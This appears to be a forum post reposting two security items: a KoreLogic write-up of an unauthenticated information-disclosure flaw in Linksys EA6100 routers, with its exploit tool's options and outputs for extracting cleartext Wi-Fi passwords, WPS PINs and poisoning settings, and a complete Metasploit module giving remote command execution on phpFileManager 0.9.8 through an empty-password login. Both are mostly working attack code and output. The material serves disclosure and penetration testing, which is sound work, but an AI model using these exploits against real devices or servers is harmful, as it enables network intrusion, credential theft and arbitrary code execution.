# ls -la sysinfo.cgi lrwxrwxrwx 1 root root 23 Jul 21 2014 sysinfo.cgi -> /www/ui/cgi/sysinfo.cgi # ls -la getstinfo.cgi lrwxrwxrwx 1 root root 23 Jul 21 2014 sysinfo.cgi -> /www/ui/cgi/getstinfo.cgi # ls -la sysinfo.cgi lrwxrwxrwx 1 root root 23 Jul 21 2014 ezwifi_cfg.cgi -> /www/ui/cgi/ezwifi_cfg.cgi These files are accessible from an unauthenticated perspective and allow the pentester to perform a variety of actions. A pentesting team with one person who is simultaneously conducting attacks from an already established network location and a geographically separate person oriented near the access point who desires access to the affected network could then use attacks like this to their advantage. This approach will reduce the need for internet-facing assets whose use may compromise the engagement while allowing for a higher degree of persistence and anonymity. These attacks are a good example of why enterprise-grade wireless security is so important. $ python kl-linksys-ea6100-auth-bypass.py --help Brought to you by Level at KoreLogic Usage: kl-linksys-ea6100-auth-bypass.py [options] Options: -h, --help show this help message and exit --host=HOST Target IP address --sysinfo Get target system information --getpwhash Get target wireless password hash --getclearpw Get target wireless SSID and cleartext password --isdefault Check if target is running the default admin credential (if yes, obtain passphrase) --resetwifi Reset the access point security (requires default passphrase) --poisonwifi Poison the access point security settings --getwpspin Get the WPS pin for the target The switches above and their corresponding description convey the functionality built into our exploit. The first is --isdefault which works by sending the access point management interface a JNAP action over HTTP. 
The JNAP functionality within the EA series access points has been discussed previously; see for example https://github.com/Qanan/Linksys-JNAP-Siphon This tool does indeed siphon out some interesting information, even information that is redundant to what we obtain through separate methods. While it used to be quite popular for the default admin account in these types of devices to just be admin/admin we found that is no longer the case for the EA series. Instead we found a (seemingly) random password on the label for our hardware. We didn't look, but let's just hope it isn't based on the serial number of the device or any other predictable value really. So, what does --isdefault do? It sends an HTTP request to the access point with a header name X-JNAP-Action whose value is a URL. Example: 404 Page Not Found The access point will return an HTTP 200 with a JSON string. The string contains a key named 'output' which also contains a JSON value. This value has a key named 'isAdminPasswordDefault' and contains a boolean indicating whether or not the password has been changed. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --isdefault Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Checking if administrator passphrase is default - [!] Passphrase is not default I changed the password, but what if I had not yet changed it? I mean, it's not admin/admin anymore so I should be good, right? Wrong. The access point will tell _anyone_ the default admin password regardless of whether it is still set or not. In cases where isAdminPasswordDefault is True, the exploit will obtain the default password in clear text. You'll see this in action later on. What about getting access to the wireless network? Well, there are a few options. If you don't mind cracking hashes then --getpwhash will make an HTTP call to the access point at getstinfo.cgi which will then return the values shown below. 
$ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --getpwhash Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Obtaining wireless password hash - SSID=[redacted] Passphrase=[redacted] What if you want to use WPS instead? No problem, just run --getwpspin. This makes an HTTP call to sysinfo.cgi and then parses the response for the value. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --getwpspin Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Getting WPS pin - WPS PIN: [redacted] If you don't want to use any of those or maybe you just want the WPA2 password, you can use --getclearpw. This also makes a HTTP call to sysinfo.cgi, except this will search for the wireless security settings which are stored in cleartext. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --getclearpw Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Obtaining wireless ssid and password - wl0 Passphrase: [redacted] wl0 SSID: [redacted] wl1 Passphrase: [redacted] wl1 SSID: [redacted] If you're looking for a "poison the well" type attack, then --poisonwifi is for you. This switch makes an HTTP call that will reconfigure NVRAM so the next time a change is applied your poisoned wireless settings will also get applied. Once the HTTP call to poison the settings has taken place, the exploit will call --getclearpw and search for your poisoned settings to ensure poisoning has taken place. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --poisonwifi Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Poisoning wireless ssid configuration [+] Access point ssid settings poisoned. An administrator will need to hit Apply anywhere in the UI Say stealth doesn't matter and this attack vector is still your best shot for some reason, if --isdefault is True the exploit can automatically reconfigure the wireless settings for quick network access. 
Using the switch --resetwifi will run --isdefault and if it returns True, it will then run a separate JNAP action that will perform the reconfiguration. $ python kl-linksys-ea6100-auth-bypass.py --host [redacted] --resetwifi Brought to you by Level at KoreLogic [+] Target host is alive, proceeding. [+] Resetting the access point security [+] Admin password is default, asking for the password [+] Got the passphrase: [redacted] [+] AP will now restart with the SSID and passphrase: korelogic/korelogic and korelogic2/korelogic2 Sursa: https://blog.korelogic.com/blog/2015/12/04/linksys-0day-unauth-infodisco.
-
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Exploit module for EDB 37709 (phpFileManager 0.9.8).
#
# Request flow, as implemented below:
#   1. `push`             -- POST frame=3 with an empty `pass` to TARGETURI;
#                            a 302 response is treated as "logged in" and its
#                            cookies are kept.
#   2. `http_send_command` -- GET TARGETURI?action=6&cmd=<cmd> with that cookie;
#                            anything other than 200 aborts the module.
#
# Detection note: that POST-then-GET pair against the same path, with
# `frame=3`/`pass=` followed by `action=6&cmd=`, is the module's footprint in
# web server access logs.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'phpFileManager 0.9.8 Remote Code Execution',
      'Description'    => %q{ This module exploits a remote code execution vulnerability in phpFileManager 0.9.8 which is a filesystem management tool on a single file. },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'hyp3rlinx', # initial discovery
          'Jay Turla' # msf
        ],
      'References'     =>
        [
          [ 'EDB', '37709' ],
          [ 'URL', 'http://phpfm.sourceforge.net/' ] # Official Website
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 2000,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['phpFileManager / Unix', { 'Platform' => 'unix' } ],
          ['phpFileManager / Windows', { 'Platform' => 'win' } ]
        ],
      'DisclosureDate' => 'Aug 28 2015',
      'DefaultTarget'  => 0))

    # TARGETURI defaults to the upstream archive's install path.
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path of phpFileManager', '/phpFileManager-0.9.8/index.php']),
      ],self.class)
  end

  # Vulnerability check: echoes a random 8-letter token through the command
  # path and looks for it in the response body.
  #
  # NOTE(review): http_send_command calls fail_with when the login step or the
  # command request does not succeed, so this check may abort with an exception
  # instead of returning CheckCode::Safe on an unreachable or patched host.
  def check
    txt = Rex::Text.rand_text_alpha(8)
    res = http_send_command("echo #{txt}")
    if res && res.body =~ /#{txt}/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Performs the login step and returns the session cookie string.
  #
  # A nil response (timeout) and any non-302 response both end the module via
  # fail_with; only a 302 is treated as a successful login.
  def push
    uri = normalize_uri(target_uri.path)
    # To push the Enter button
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'vars_post' => {
        'frame' => '3',
        'pass' => '' # yep this should be empty
      }
    })
    if res.nil?
      vprint_error("#{peer} - Connection timed out")
      fail_with(Failure::Unknown, "Failed to trigger the Enter button")
    end
    if res && res.headers && res.code == 302
      print_good("#{peer} - Logged in to the file manager")
      # Cookies from the redirect are the session reused by the command step.
      cookie = res.get_cookies
      cookie
    else
      fail_with(Failure::Unknown, "#{peer} - Error entering the file manager")
    end
  end

  # Logs in (via push) and issues one command; returns the HTTP response.
  # Every call performs a fresh login, so check and exploit each log in once.
  def http_send_command(cmd)
    cookie = push
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path),
      'cookie' => cookie,
      'vars_get' => {
        'action' => '6',
        'cmd' => cmd
      }
    })
    unless res && res.code == 200
      fail_with(Failure::Unknown, "Failed to execute the command.")
    end
    res
  end

  # Entry point: sends the encoded cmd payload through http_send_command.
  def exploit
    http_send_command(payload.encoded)
  end
end
Sursa: https://www.exploit-db.com/exploits/38900/.